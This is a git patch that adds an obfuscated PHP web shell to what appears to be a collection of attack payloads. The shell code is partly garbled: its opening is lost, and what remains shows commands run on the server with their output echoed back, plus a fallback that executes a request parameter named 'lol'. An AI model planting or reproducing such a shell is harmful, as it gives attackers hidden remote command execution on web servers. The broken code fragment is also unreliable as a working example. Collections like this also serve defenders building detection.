From 090addc816e36fe1a5e29eba3705d3381c904673 Mon Sep 17 00:00:00 2001 From: azams Date: Sat, 2 Apr 2022 05:25:23 -0700 Subject: [PATCH] Add another obfuscated php shell. --- Web-Shells/PHP/another-obfuscated-phpshell.php | 14 ++++++++++++++ 1 file changed, 14 insertions(+) create mode 100644 Web-Shells/PHP/another-obfuscated-phpshell.php diff --git a/Web-Shells/PHP/another-obfuscated-phpshell.php b/Web-Shells/PHP/another-obfuscated-phpshell.php new file mode 100644 index 00000000..16a7689a --- /dev/null +++ b/Web-Shells/PHP/another-obfuscated-phpshell.php @@ -0,0 +1,14 @@ +&1", $arr); + echo join("\n",$arr)."\n"; + } else echo $A($P['lol']); + exit; + } +} \ No newline at end of file